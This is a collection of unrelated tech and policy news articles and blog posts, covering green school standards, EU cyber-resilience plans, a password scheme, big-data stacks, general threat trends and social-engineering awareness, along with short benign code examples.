Everybody wants to be green these days, but some businesses and governments try to cheat. They implement token measures for public relations reasons that don't significantly increase energy efficiency, reduce carbon emissions or clean the environment. Many in the environmental community call it "greenwashing," said Kristin Heinen, assistant director of the Collaborative of High Performance Schools (CHPS).
The CHPS, a partnership of public utilities, government agencies and industry, sets the standard for green schools in California. The organization started in 1999 as a project of the California Energy Commission, working with public utilities to promote greener, healthier schools. In 2001, the CHPS became a nonprofit organization.
The CHPS promotes "high-performance" standards aimed at making schools greener, healthier and more academically beneficial. To prevent greenwashing, the CHPS requires schools to clear two bars before classifying them as high-performance schools.
First, the school must meet 11 baseline standards. For example, energy efficiency must be at least 10 percent above the state's normal code requirement. After the school meets the 11 standards, it faces a point system in which it must earn 32 points to win the CHPS's endorsement. Schools earn these points for measures they take beyond the 11 baseline requirements, spread across six categories. The first category is further energy efficiency. The second is sustainable site selection, i.e., efforts to reduce hazards like erosion from water runoff. The third is material efficiency, meaning construction that minimizes the use of raw natural resources. The fourth is water usage efficiency, and the fifth is indoor environmental quality. The sixth is policy and operation - the measures needed to operate and maintain the school's high-performance features.
A school could accrue all 32 points from just a few of those categories, or from all of them.
"It's really flexible for school districts," Heinen said. "Something that is really easy in Los Angeles could be really difficult for school districts in the central valley or the [San Francisco] Bay Area. It allows school districts to choose which points or features work best for their climate or local priorities. Obviously water is a bigger issue in Los Angeles than in the Bay Area. Los Angeles might want to choose more water efficiency credits."
More than 25 CHPS schools have finished construction so far, with another 100 under way. Several other states now pursue the CHPS's guidance on school construction. The organization will go national in 2008.
What's Considered "High Performance"
In addition to green efforts, the CHPS requires measures to promote a healthy environment, like using paint, carpet and flooring with low emissions of harmful toxins.
"We have some pretty strict standards on ventilation in the classroom to make sure there is plenty of fresh air coming in," Heinen said. "If you're in a classroom with 30 kids, and one of them is sick, with poor ventilation, there is a higher chance all the other kids will get sick."
The CHPS argues that this health aspect leads directly to financial benefits for schools: the less often kids are sick, the more days they attend school, and attendance drives funding.
"The school gets more money, the children are healthier, and they're performing better, so everyone's happy," Heinen said.
Another aspect of CHPS high-performance standards is academic performance. For example, the organization mandates certain acoustical standards for schools sited near a highway or train track.
Schools can also get CHPS points for installing mechanisms designed to fill classrooms with natural light, rather than electric.
"Natural light is a lot easier on the eyes. It's a matter of orienting the building - putting it in a position where you can take advantage of sunlight during the daytime."
The buildings also use "light shelves" to bounce more light onto the ceilings, illuminating classrooms even more.
"They're like a shelf that hangs off the outside of the window," Heinen said. "Usually they look like they're decorative, but they actually perform a function."
CHPS schools also save money on maintenance costs because they involve many automated functions.
"A good example is waterless urinals. If you install waterless urinals, the way they're designed, water doesn't flush through them. The maintenance staff doesn't have to clean them every day," Heinen said. "We also require training of the maintenance operation staff so they know how to maintain and operate them." Solar Schools
Heinen said CHPS schools typically saved from 30 percent to 40 percent on their energy bills, compared to schools of similar sizes and locations.
In 2005, the New Haven Unified School District (NHUSD) in California built Conley-Caraballo High School, a CHPS school, in Hayward. Roughly 85 percent of the school's electricity comes from its solar power facility.
The system cost roughly $840,000, but the school district paid only $440,000. Pacific Gas and Electric Co., the district's local utility, gave it a grant of $263,087, and state solar incentives covered the remainder.
The district estimates that the solar system will save roughly $40,000 per year, taking it roughly 10 to 12 years to recover its investment. The system's life expectancy is 20 to 30 years, meaning it will save the district roughly $1 million in the long run, according to estimates.
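The arithmetic behind those estimates is easy to check. Here is a quick back-of-the-envelope calculation using the figures quoted above; the 25-year lifetime is an assumed midpoint of the 20-to-30-year range, not a number from the district.

```python
# Back-of-the-envelope check of the district's solar estimates.
# Figures come from the article; the 25-year lifetime is an assumed midpoint.
system_cost = 840_000          # total installed cost ($)
district_paid = 440_000        # district's share after incentives ($)
pge_grant = 263_087            # Pacific Gas and Electric grant ($)
state_incentives = system_cost - district_paid - pge_grant

annual_savings = 40_000        # estimated energy savings per year ($)
payback_years = district_paid / annual_savings
lifetime_years = 25            # assumed midpoint of the 20-30 year range
lifetime_savings = annual_savings * lifetime_years

print(f"State incentives covered roughly ${state_incentives:,.0f}")
print(f"Payback on the district's investment: ~{payback_years:.0f} years")
print(f"Gross savings over {lifetime_years} years: ~${lifetime_savings:,.0f}")
```

The output (about $137,000 in state incentives, an 11-year payback and $1 million in gross savings) lines up with the district's published figures.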
Enrique Palacios, executive director of operations for the NHUSD, plans to bring solar power to all schools in the district. Just as mass federal purchasing of recycled paper during the 1970s and '80s drove down the price of recycled paper across the market, Palacios wants government to do the same with solar power.
"As we in the public sector get into buying more solar, then the cost of solar will drop and make it affordable for everybody," Palacios said, adding that he also embraces CHPS standards as a way to culturally influence kids to value green technology. | <urn:uuid:7620f468-bf57-4a0a-bc6b-cee7088a1dbd> | CC-MAIN-2017-09 | http://www.govtech.com/education/No-Greenwashing.html?page=2 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169776.21/warc/CC-MAIN-20170219104609-00375-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.959983 | 1,215 | 3.140625 | 3 |
Electronic communication services and networks provide the backbone of the European economy. 93% of EU companies and 51% of Europeans actively used the internet in 2007. However, natural disasters, terrorist attacks, malicious human action and hardware failure can pose serious risks to Europe’s critical information infrastructures.
Recent large scale attacks on Estonia, Lithuania and Georgia proved that essential electronic communication services and networks are under constant threat. Preparing Europe to act in case of major disruptions or attacks is the goal of a new strategy proposed today by the European Commission.
In 2007, after large-scale cyber attacks, the Estonian Parliament had to shut down its email system for 12 hours and two major Estonian banks had to stop their online services. There is a 10% to 20% probability that telecom networks will be hit by a major breakdown in the next 10 years, with a potential global economic cost of around €193 billion ($250 billion). This could be caused by natural disasters, hardware failures or the rupture of submarine cables (there were 50 incidents recorded in the Atlantic Ocean in 2007 alone), as well as by human actions such as terrorism or cyber attacks, which are becoming more and more sophisticated.
The smooth functioning of communications infrastructures is vital for the European economy and society. Communications networks also underpin most of our activities in daily life. Purchases and sales over electronic networks amounted to 11% of the total turnover of EU companies in 2007. 77% of businesses accessed banking services via the internet and 65% of companies used online public services.
In 2008, the number of mobile phone lines was equivalent to 119% of the EU population. Communications infrastructure also underpins the functioning of key areas from energy distribution and water supply to transport, finance and other critical services.
The Commission today called for action to protect these critical information infrastructures by making the EU more prepared for and resistant to cyber attacks and disruptions. At the moment Member States’ approaches and capacities differ widely. A low level of preparedness in one country can make others more vulnerable, while a lack of coordination reduces the effectiveness of countermeasures.
Viviane Reding, Commissioner for Information Society and Media said:
The Information Society brings us countless new opportunities and it is our duty to ensure that it develops on a solid and sustainable base. Europe must be at the forefront in engaging citizens, businesses and public administrations to tackle the challenges of improving the security and resilience of Europe’s critical information infrastructures. There must be no weak links in Europe’s cyber security.
The European Commission wants all stakeholders, in particular businesses, public administrations and citizens to focus on the following issues:
Preparedness and prevention: fostering cooperation, exchange of information and transfer of good policy practices between Member States via a European Forum. Establishing a European Public-Private Partnership for Resilience, which will help businesses to share experience and information with public authorities. Both public and private actors should work together to ensure that adequate and consistent levels of preventive, detection, emergency and recovery measures are in place in all Member States.
Detection and response: supporting the development of a European information sharing and alert system.
Mitigation and recovery: stimulating stronger cooperation between Member States via national and multinational contingency plans and regular exercises for large-scale network security incident response and disaster recovery.
International cooperation: driving a Europe-wide debate to set EU priorities for the long term resilience and stability of the Internet, with a view to proposing principles and guidelines to be promoted internationally.
Establish criteria for European critical infrastructure in the ICT sector: the criteria and approaches currently vary across Member States.
The Commission today invited the European Network and Information Security Agency (ENISA) to support this initiative by fostering a dialogue between all actors and the cooperation necessary at the European level.
Mr. Andrea Pirotti, Executive Director of ENISA, confirmed today that the Agency is able to support the Commission's initiative by strengthening its resources. Commenting on the communication, Mr. Pirotti clarified:
ENISA is ready to pick up the gavel and support the European Commission in its efforts to address these crucial matters. The Agency is willing to do everything within its mandate to support all necessary actions of the EU and its Member States to combat these threats and to protect the economy of Europe, which, ultimately may be at stake.
I am one of those people that have a very short attention span for technical instructions, so let me try to explain this as briefly and clearly as possible, just in case you are like me. 🙂 The idea is to use a system that allows you to do 2 things:
1. Remember your passwords by writing part of them down. The only thing you need to memorize is a part that is the same for all your passwords; a pin, if you will.
2. Create passwords that are good and strong, unique and can’t be guessed
Here are the step-by-step instructions:
1. Think of a “pin” for your password, this is the part that is same for all of your passwords. The pin should be 3 characters or longer, it could be something like “25!” and this part should be kept secret.
2. For each of the web sites that you need a password for, you create a code that helps you remember what site/service the password is for. For example aMa for Amazon and gMa for gmail.
3. Continue the password with a random set of 4 or more characters, for example: 2299 or xy76. You should use different random characters for your different passwords.
4. Write down the parts from steps 2 & 3 (the site code and the random characters) on a note and keep it safe so you don’t forget them. In this example you would end up with a note in your wallet with this written down: aMa2299 and gMaxy76.
5. When using the passwords, add your pin to them. Remember again that the pin should not be written down anywhere! You can decide the location of your pin too. With the example pin “25!” created in the first step we would end up with 2 passwords that could be 25!aMa2299 and 25!gMaxy76 (or aMa229925! and gMaxy7625!, if you prefer the pin at the end).
Tadaa, you now have passwords that are unique and can’t be guessed! And of course you only need to remember a part of it! By having unique passwords you can also make sure that even if someone finds out one of your passwords, the others are still safe.
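For readers who think in code, here is a minimal Python sketch of the same idea. The site codes and pin are the illustrative values from this post; in practice you would pick your own, and the pin would live only in your head.

```python
import secrets
import string

def make_password(site_code, pin, suffix_length=4):
    """Return (note_part, full_password) for one site.

    note_part is what you write down; the pin is never written anywhere.
    """
    alphabet = string.ascii_letters + string.digits
    random_suffix = "".join(secrets.choice(alphabet) for _ in range(suffix_length))
    note_part = site_code + random_suffix   # e.g. "aMa2299" -- safe to keep in your wallet
    full_password = pin + note_part         # the pin's position is your choice; here it goes first
    return note_part, full_password

pin = "25!"                                 # the secret part, identical for every site
for site in ("aMa", "gMa"):                 # Amazon, Gmail
    note, password = make_password(site, pin)
    print(f"write down: {note}   actual password: {password}")
```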
As a final note, should you choose to use this system, you should come up with your own passwords and not use the ones used in this post or in our Lab’s post.
Hopefully I managed to make it sound relatively easy. If not, drop me a question below.
Scientists at CERN, the European Organization for Nuclear Research, announced that they have observed a particle that might turn out to be the long-sought Higgs boson, or "God particle," thought to be part of the explanation for why matter has mass. And a worldwide network of computers played a key role in the discovery.
The particle is the heaviest boson ever found. If it is indeed the Higgs boson, it would give scientists a more complete understanding of the nature of the universe.
Scientists will have a clearer picture later this year after the Large Hadron Collider, the largest particle accelerator in the world, provides more data. "We now have more than double the data we had last year," said Sergio Bertolucci, CERN's director of research and computing, in a statement. "That should be enough to see whether the trends we were seeing in the 2011 data are still there."
CERN's 17-mile-long collider generates hundreds of millions of particle collisions each second. Recording, storing and analyzing these collisions represents a massive challenge; the collider produces roughly 20 million gigabytes of data each year.
CERN stores that data partly on the premises in Geneva, but has to distribute roughly 80% to data centers all around the world through the Worldwide LHC Computing Grid.
That network is key to CERN's research, said Rolf-Dieter Heuer, CERN's director general. "Without the worldwide grid," he said, "this result would not have happened."
This version of this story was originally published in Computerworld's print edition. It was adapted from an article that appeared earlier on Computerworld.com.
This story, "Global grid helps CERN find 'God particle'" was originally published by Computerworld. | <urn:uuid:7ea0d47d-8b81-4497-8918-624638988916> | CC-MAIN-2017-09 | http://www.itworld.com/article/2723644/data-center/global-grid-helps-cern-find--god-particle-.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170875.20/warc/CC-MAIN-20170219104610-00423-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.949553 | 384 | 3.203125 | 3 |
Companies are building new applications every day – whether to meet their own requirements or to serve their customers. Open source platforms are increasingly being used to support these applications, moving from initial development and experimentation into production.
For example, Apache Hadoop provides support for storage of huge volumes of data and companies are now looking at how to get more from their 'data lakes.' Meanwhile, new stacks of tools are being developed to help developers build their applications faster.
One example here is the SMACK stack, which includes the following components:
Spark – delivers near real-time and batch analytics on large volumes of data
Mesos – provides the 'operating system' for the data centre, or in this case for all the components within the application
Akka – a toolkit and runtime for building highly concurrent, distributed and resilient message-driven applications
Cassandra – a distributed database management system that can cope with huge volumes of data
Kafka – a message broker for managing and sending data.
Brought together, these elements provide the necessary building blocks for running applications that can handle hundreds or millions of transactions per second. This approach – based on open source projects – allows companies to scale up their applications by adding nodes to clusters, rather than having to migrate to newer and bigger appliances or server hardware. These technologies grew out of massive scaling needs and were developed by the likes of Google, Amazon, LinkedIn and Facebook to run their operations.
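As a rough illustration of how the pieces fit together, the sketch below uses Spark Structured Streaming to read events from Kafka and write them to Cassandra. It assumes PySpark with the Kafka source and the DataStax spark-cassandra-connector packages available, and the broker address, topic, keyspace and table names are hypothetical; it shows the pattern, not a production deployment.

```python
from pyspark.sql import SparkSession

# Assumes the spark-sql-kafka and spark-cassandra-connector packages are on the classpath.
spark = (SparkSession.builder
         .appName("smack-sketch")
         .config("spark.cassandra.connection.host", "cassandra-node1")  # hypothetical host
         .getOrCreate())

# Read a stream of events from Kafka (hypothetical "transactions" topic).
events = (spark.readStream
          .format("kafka")
          .option("kafka.bootstrap.servers", "kafka-broker1:9092")
          .option("subscribe", "transactions")
          .load()
          .selectExpr("CAST(key AS STRING) AS id", "CAST(value AS STRING) AS payload"))

# Write each micro-batch to a Cassandra table (hypothetical keyspace/table).
def write_to_cassandra(batch_df, batch_id):
    (batch_df.write
     .format("org.apache.spark.sql.cassandra")
     .options(keyspace="shop", table="transactions")
     .mode("append")
     .save())

query = events.writeStream.foreachBatch(write_to_cassandra).start()
query.awaitTermination()
```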
In combination, these open source elements help companies run at scale while meeting customer expectations for service. However, there are a couple of elements that developers and CIOs both have to consider as these applications are moved into production. The first element is support.
Making open source and big data work in production
All the parts of the SMACK stack are supported by different projects within the Apache Software Foundation, with the exception of Akka, which is available under the Apache License and supported by Typesafe. For CIOs, while the stack itself may interoperate well and people with the skills to support the individual parts are available, this can still represent a challenge for running in production.
The communities around open source projects tend to be very active and growing, while commercial support is available for the open source toolsets involved. In 2016, I see more of the stack elements being supported by single companies to make this easier for CIOs to understand and get behind.
It’s easy to underestimate how important that 'single throat to choke' can be in running production IT systems, and open source continues to develop that approach in response to customer demand.
Alongside this, there are more options available for how data can be created and stored. There are many new database options available for IT teams to consider – the recent Gartner Magic Quadrant for Operational Databases in 2015 listed 30 vendors, all supporting their own products both open source and proprietary.
This variety offers IT teams a huge amount of choice and the potential to go down “best of breed routes” for their data; however, this can also lead to problems when it comes to support.
Next year, there should be greater consolidation in the market as vendors buy each other or start to support multiple database platforms under one roof. This should make it simpler for companies to run their critical applications on open source database platforms in the future.
Securing the future for open source applications
The second element here is security of data. Alongside the ability to run and support production volumes of data from a customer experience perspective, the security of that data is mission critical.
This has developed significantly over the past year as more companies begin to make the transition into running big data applications within their production applications. As these companies rely on those applications for revenue, the teams involved care more about security of the data they are putting into the system.
Both community and commercial open source projects are responding to this increasing demand for security. Steps like user and role-based authentication and management of object permissions can control the security of data stored within the database layer so that only those developers and team members allowed to view the data can access it.
Many of these open source platforms can work in fully distributed environments spread across the Cloud and on-premises clusters. For the NoSQL database Cassandra, the links between these clusters can be encrypted using SSL so that all data remains protected as well.
Alongside this, authentication of the nodes within Cassandra clusters to each other can be managed using Kerberos, LDAP or Active Directory when communication takes place over a non-secure network too.
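As a concrete, if simplified, sketch of what this looks like from the application side, the snippet below shows an authenticated, SSL-encrypted connection to a Cassandra cluster using the DataStax Python driver. The host names, credentials, certificate path and keyspace are placeholders, and the exact SSL options vary by driver version.

```python
import ssl
from cassandra.cluster import Cluster
from cassandra.auth import PlainTextAuthProvider

# Placeholder credentials -- in practice these come from a secrets store, not source code.
auth = PlainTextAuthProvider(username="app_user", password="app_password")

# Client-to-node encryption: trust only the cluster's CA certificate (hypothetical path).
ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ssl_ctx.load_verify_locations("/etc/cassandra/certs/cluster-ca.pem")

cluster = Cluster(
    contact_points=["cassandra1.internal", "cassandra2.internal"],  # hypothetical nodes
    auth_provider=auth,
    ssl_context=ssl_ctx,
)
session = cluster.connect("shop")  # hypothetical keyspace

# Only roles granted access to this table can read it (role-based authorization).
rows = session.execute("SELECT id, total FROM transactions LIMIT 10")
for row in rows:
    print(row.id, row.total)

cluster.shutdown()
```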
For companies bringing together multiple open source tools that can pass data between each other, security of the elements involved should also be considered. Use of credentials for gaining access to components can ensure that authentication is completed, for example.
Alongside this, CIOs can work with their vendors to go through security requirements and ensure that their implementations are compliant with any relevant legislation as well as protected against outside attack.
Looking forward, many companies are implementing open source elements within their core business applications. This has gone beyond the web server infrastructure and into how business data is created, analysed and used to provide customer services. Supporting this move into production will be important for the future success of these applications.
Sourced from Patrick McFadin, Chief Evangelist for Apache Cassandra, DataStax
The recent Hydraq attacks were the latest example of just how radically the Internet threat landscape has changed over the past few years, and how vulnerable companies and their information stores are to cyber attacks. The attackers were not hobbyist hackers; they were criminals attempting to steal intellectual property. Hydraq is an example of how cybercrime has evolved from hackers simply pursuing public notoriety to covert, well-organized attacks that leverage insidious malware and social engineering tactics to target key individuals and penetrate corporate networks. Many of today's attacks are highly sophisticated espionage campaigns attempting to silently steal confidential information. This should raise the alarm for companies of all sizes and across all industries, as information is a business' most valuable asset. Information not only supports business, it also enables and helps drive it in a global marketplace in which having the right information at the right time can mean the difference between profitability and loss.
However, while information security has never been more important, it has also never been more challenging. Businesses have more information to protect at more points against more threats than ever before. In such an environment, businesses can build an effective defense only after they first understand the peculiarities of today's threat landscape and then identify their own specific areas of vulnerability. Armed with this information, organizations can then develop an information security blueprint that is right for them—one that is comprehensive, proactive, enforceable, and manageable.
More Threats, More Complexity
Today's headlines are rife with accounts of information security threats and data breaches, and this alarming trend is clearly borne out in statistics as well. For example, in 2009, Symantec identified more than 240 million distinct new malicious programs, a 100 percent increase over 2008.
However, viruses, worms and other types of malicious code are not the only threats to information today. Businesses now are also at risk from botnets, phishing attacks, and spam. Sixty percent of all data breaches that exposed identities were the result of hacking. In a sign that this issue is not limited to a few larger enterprises, the 2010 Symantec State of Enterprise Security Report found that 75 percent of enterprises surveyed experienced some form of cyber attack in 2009. And spam made up 88 percent of all email observed by Symantec. Of the 107 billion spam messages distributed globally per day on average, 85 percent were from botnets, according to the Symantec Internet Security Threat Report.
Protecting against security threats has also become more challenging as businesses deploy a greater variety of devices throughout their infrastructure. The laptops and desktops of yesterday are now complemented by smart phones, USB drives, and even portable entertainment devices that employees routinely bring into the workplace and connect to the company network. The corporate information infrastructure has also become more complex with the introduction of cloud computing, virtualization, and other important technologies that offer significant business benefits but must also be protected.
At the same time, the volume of information in the average company is doubling every two years, even as more and more people—from employees to suppliers, contractors, customers, and others—have access to corporate network resources and company information.
Not only are threats increasing in number and sophistication and information infrastructures becoming more complex, but security breaches are also being driven by different forces today. Too often, well-meaning employees who have legitimate access to corporate information lose their laptops or USB drives, and organizations follow broken business processes that put critical information at risk. Security breaches may also be launched by malicious insiders who have access to corporate information and resources and leverage their authorized status to deliberately cause a breach.
Perhaps the most dramatic development in the threat landscape is that external attacks are no longer being conducted primarily by hackers who want to bring systems down but by organized cybercriminals who operate in a well-organized and thriving global underground economy where stolen information and fraud-related tools and services are bought and sold around the clock.
In this professionalized environment, cybercriminals launch attacks in four stages, often using dedicated teams that specialize in a specific stage. The attack begins with an incursion phase, in which cybercriminals try to gain access to their potential victim's network by using a variety of malicious programs and tools. Once in, the attackers move to the discovery phase where they map out the assets of the company in order to find vulnerabilities in the company's infrastructure or business processes that could be exploited.
Upon discovering company assets, attackers then move into the capture phase where they find and seize information that has a black market value, such as credit card information, identities, customer or patient records, intellectual property, and more. Once this information is found and captured, the cybercriminals look to get that information out in the exfiltration phase of the attack.
Unfortunately, these four-phased attacks have proven to be highly successful when used against organizations of all sizes, from large government agencies, big retailers, and financial services giants to small and mid-sized businesses across the U.S.
Information Security Vulnerabilities and Remediation
While the threat and attack landscapes have become more sophisticated and diverse, the factors that lead to vulnerability to threats and attacks are surprisingly straightforward and simple. Today's security breaches and attacks target companies with poorly enforced IT policies, poorly protected information, poorly managed systems and poorly protected infrastructure.
Poorly enforced IT policies contribute to vulnerability, leaving businesses exposed to broken processes that hinder protection. Businesses can address this vulnerability by prioritizing risks and enforcing strong IT policies that span across their various locations, and by using automation and workflow tools that help them not only remediate incidents but also anticipate them.
Businesses with poorly protected information are vulnerable to security breaches and data loss because they do not know where their information assets are at any point in time or who has access to their information. To address this vulnerability, businesses need to take a more content-aware approach to protecting information so they know where sensitive data resides, who has access to it, and how it is coming in or leaving the company.
Businesses with poorly managed systems are vulnerable to security breaches and attacks because they cannot efficiently manage their IT infrastructure through its lifecycle. In 2008, Symantec documented 5,471 vulnerabilities, 80 percent of which were classified as easily exploitable. To address these vulnerabilities, businesses can leverage toolsets that provide integrated capabilities for managing security as well as provisioning, patching, licensing, workflow, and decommissioning.
Finally, a poorly protected infrastructure leads to increased vulnerability not only because the organization lacks the appropriate protective mechanisms but also because it does not have the visibility across the infrastructure that is required to identify gaps in protection and offer actionable recommendations for remediation. Businesses with a poorly protected infrastructure can address this vulnerability with integrated security technologies that provide insight into their infrastructure, proactive protection across the entire environment, and rapid response to emerging attacks.
Information security today is more challenging than ever. Yet, businesses can improve their security posture through understanding the threats and vulnerabilities of their environment and leveraging processes and tools to mitigate risk, thereby increasing their competitive edge in today's information-driven world.
The next article in this two-part series will examine how companies can put into place a security blueprint that enforces IT policies, protects their infrastructure and information, and manages systems more efficiently.
Francis deSouza leads engineering, product management, field enablement, business development, and operations for Symantec's Endpoint Security and Management, Data Loss Prevention, and Information Risk Management businesses.
No matter how advanced our computer security technology is, the weakest point is still us, the users. Hackers can often bypass even the best defenses with our unwitting help, turning our kindness, willingness to help and other human traits against us. This is known as social engineering, and it's one of the most difficult attacks to protect against.
What is social engineering?
Wikipedia defines social engineering as “psychological manipulation of people into performing actions or divulging confidential information.” That means using low-tech methods to get us to do things we wouldn’t normally do.
Here are some examples:
Your building uses key cards to access doors to the building. Someone carrying boxes will approach you as you enter, say they can’t reach their card, and ask you to hold the door for them. The average person would be willing to help in a situation like this; we’ve all been carrying boxes and needed help with the door.
You receive an email from the tech support at your company informing you of new password policies and asking you to click on a link to update your password to make it more complex. The email is addressed to you directly and appears to come from the correct email address for tech support.
You receive a phone call from someone who claims to be from your bank informing you that there has been some suspicious activity on your bank account. They ask you to confirm some purchases that you don’t recognize. They tell you that they will be sending you an email with a link for you to change your online banking password.
These are all examples of how attackers can use social engineering to get you to do something you wouldn’t normally do.
The top 5 ways hackers use social engineering
- Quid pro quo
Quid pro quo is Latin for "this for that". It means offering you something, an incentive, in exchange for your help.
- Pretexting
Pretexting is inventing a believable scenario, such as posing as tech support or your bank, to persuade the victim to hand over information or access.
- Phishing
Phishing is becoming the most common form of attack and relies on pretexting to be effective. It uses very carefully crafted emails that are sent to a target and get the victim to click on links that, in turn, infect the target's computer with malware.
- Tailgating
Tailgating is following someone into a secured area, such as the person carrying the boxes mentioned above. Attackers use our willingness to help and to be kind as a way to get around security procedures.
- Baiting
Baiting is when an attacker leaves infected USB flash drives lying around in the hope that a victim will plug one into a computer to see what is on it. The computer will then be infected and the attacker can begin his work.
We’ve outlined the most common forms of social engineering that an attacker will use to go after us, the users. By being on the lookout for these types of attacks, you can help prevent yourself from being taken advantage of.
If you have any questions on this or want to make sure your own organization is protected from the most common attacks, please contact us at 770-506-4383 to schedule your free assessment.
By Adam Dickter / CIO Today. Updated February 07, 2014.
We've already got the technology to remotely wipe data from our devices if they are lost or stolen. But the U.S. Department of Defense (DoD) wants to go one step further with sophisticated sensor devices it hopes to use on the battlefields of the future.
With the help of tech giant IBM, the DoD wants to deploy gadgets that can be blown to bits via remote control to keep them from falling into enemy hands.
Glass As Driving Force
The department's Defense Advanced Research Projects Agency last month awarded Big Blue a contract worth $3.45 million for Vanishing Programmable Resources (VAPR), a cute acronym for a technology that basically vaporizes electronics.
The grant, published on the government's General Services Administration Web site and first reported by the British Broadcasting Corporation, aims to "develop and establish a basis set of materials, components, integration, and manufacturing capabilities to undergird this new class of electronics."
According to the DARPA synopsis, IBM will use the tendency of strained glass substrates to shatter as the driving force to reduce device chips to worthless powder.
"A trigger, such as a fuse or a reactive metal layer will be used to initiate shattering, in at least one location, on the glass substrate," it said. "An external [radio frequency] signal will be required for this process to be initiated. IBM will explore various schemes to enhance glass shattering and techniques to transfer this into the attached CMOS [complementary metal oxide semiconductor] devices."
The announcement comes at the same time that the California state Senate is considering a bill that would empower civilians to do something similar, though less destructive, by mandating so-called "kill switches" that would render smartphones inoperable if stolen.
Charles King, principal analyst at Pund-IT, told us that bricking a device or wiping out data might be OK for a device that holds personal information or trade secrets, but not for the military.
Digital Poison Pill
"Practically speaking, it’s an added layer of security," said King. "Data wiping requires the device be connected to some sort of IP-enabled network which allows the wipe command to be transmitted. I’m not quite sure how the self-destruct command would be triggered in this case. Maybe by the digital version of a poison pill inserted into a hollow tooth?"
King added that the sensor devices the military is considering would likely be more effective for reconnaissance than eyes in the sky in the form of drones and satellites.
"As sophisticated as they are, satellites can’t see/do everything, particularly in contextualizing situations and locales," he said. "This sounds like it’s mainly designed for 'boots on the ground' scenarios where soldiers get up close and personal with the areas/people they’re engaging.
As for civilian uses once the technology is perfected? "If it were cheap enough, it’d be a heck of a way to deter kids from buying excess apps or exceeding their call/texting limits," King said, jokingly. "Could also apply it to friends/neighbors who fail to return the items they borrow."
Gates drove Microsoft's focus toward developer tools and application foundations in a way that tracked the evolving nature of the developer community.
When Bill Gates first became interested in computers, being a user of a small computer meant being a hobbyist programmer, not a gamer, not a video producer, not a social networker. It's therefore no surprise that Gates drove Microsoft's focus toward developer tools and application foundations in a way that tracked the evolving nature of the developer community.
When anyone buying a PC was at least somewhat interested in programming, typing BASICA at the DOS prompt opened the door to an out-of-the-box ability for the machine to learn and to follow new instructions.
When "power users" became important to the adoption and spread of PCs as workplace tools, mechanisms such as DOS batch files and command shells were there to pave the way toward building more automated environments.
When graphical interaction moved beyond the novelty of the Macintosh (handicapped in its early years by costly and quirky development tools) to become the expected norm for mainstream applications, Microsoft's Visual Basic was an enormous leap in the ease of designing an interface and populating it with application behavior.
As a major side effect, though, VB arguably warped a generation of budding programming talent in the process, and thereon hangs a tale.
The reason for the shift toward Web-based application development is that new Web development technologies better fit today's mobile platforms, said Cameron Purdy, vice president of development for Oracle, at the QCon software conference in New York on Tuesday.
To bolster his argument, Purdy examined the reasons behind Java's rise in popularity in the mid-1990s, when C++ was the dominant programming language for building enterprise applications.
Many have attributed the rapid success of Java to the efforts of the company that created it, Sun Microsystems, but this wasn't strictly the case, Purdy argued. "Java wasn't big because it was well-marketed ... Sun couldn't market its way out of a paper bag," he said. (Oracle now owns the trademarks to Java.) Rather, Java grew in popularity because it best fit the needs of the developers at the time. "There were real technical reasons that Java was important," he said.
At the time, Java simplified programming in a number of ways. It automated garbage collection, the act of freeing up memory that is no longer used. Writing code to free memory in C++ programs can be burdensome to programmers. By automating garbage collection, Java also paved the way for greater use of frameworks, or sets of libraries that automate various routine tasks. Java was also better suited for running across multiple platforms, a capability C++ offered in theory but that was difficult to implement in practice.
C++ does have some upsides, Purdy admitted. It is faster, thanks to how the code is compiled directly against a specific hardware platform. Also, Java's garbage collection routine can slow the operation of a program at inopportune times, even with careful scheduling. Another upside: A C++ program does not take up as much memory as a Java program, because it does not need as many supporting files and is written for the specific architecture it is being run upon.
But these advantages weren't of high importance for programmers when the Web was just emerging. Memory wasn't a huge issue, because Java applications tended to be run from a server, which tended to have a generous supply of memory. Nor was speed a critical issue. Most of the long start-up times that are associated with Java programs come from times needed to start a Java Virtual Machine (JVM) to run the program. But the application server software typically keeps the JVM running continuously, meaning that Java applications could be just as speedy as their C++ counterparts. "How often do you start your Web application? Once a day? Once a month?" Purdy asked.
Also, Java programs are better suited for running on multicore processors than C++ programs, Purdy argued. Programming for multicore processors can be a tedious task in C++. In contrast, Java's virtual machine handles the issue of which processors to use.
"All the benefits of C++ were not valuable. The strengths of Java are well-suited for this world," Purdy concluded. Though C and C++ are particularly suited for writing to a particular platform, crucial when developing an operating system or browser, such development efforts are not always called for. "How many browsers do we need?" he asked, rhetorically. "There are just not many places I need C++," he said.
Today's programming needs promise a disruption similar to the one that occurred when Java supplanted C++, Purdy said. We are moving from a server-side architecture to what he called a "thin server architecture," a shift he attributes to a combination of cloud computing, HTML5 and mobile devices.
"These three things will conspire to be a perfect storm in our industry," Purdy said.
"Applications will shift from a very fat server model, where all the display logic is held on the server, to a much more thin server model where the display logic is in the browser itself," Purdy said. "Its communications with the server is with services and data."
Purdy's claim seems to get some backing from other parties who also see that Web application development is taking hold in the enterprise market. In a survey sponsored by Zend, a company that offers commercial support tools for the PHP Web programming language, 97 percent of 117 business and IT executives who said their organizations currently use PHP will use the Web programming language for additional applications in the future. Many cited the speed and flexibility of Web application development as a factor for choosing this approach over the more traditional approach of developing desktop applications.
The QCon conference runs through Wednesday.
A new low-power, "brain-inspired" supercomputing platform based on IBM chip technology will soon start exploring deep learning for the U.S. nuclear program.
Lawrence Livermore National Laboratory announced on Tuesday that it has purchased the platform, based on the TrueNorth neurosynaptic chip IBM introduced in 2014. It will use the technology to evaluate machine-learning and deep-learning applications for the National Nuclear Security Administration.
The computer will process data with the equivalent of 16 million neurons and 4 billion synapses and consume roughly as much energy as a tablet PC. Also included will be an accompanying ecosystem consisting of a simulator; a programming language; an integrated programming environment; a library of algorithms and applications; firmware; tools for composing neural networks for deep learning; a teaching curriculum; and cloud enablement.
A single TrueNorth processor consists of 5.4 billion transistors wired together to create an array of one million digital neurons that communicate with one another via 256 million electrical synapses.
With 16 TrueNorth chips, the new system will consume a mere 2.5 watts of power, allowing it to infer complex cognitive tasks such as pattern recognition and integrated sensory processing far more efficiently than conventional chips can, IBM said.
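The headline numbers scale directly from the single-chip figures. A quick check, treating the stated 2.5 watts as the total for the 16-chip array as the article implies:

```python
# Scaling the published single-chip TrueNorth figures up to the 16-chip system.
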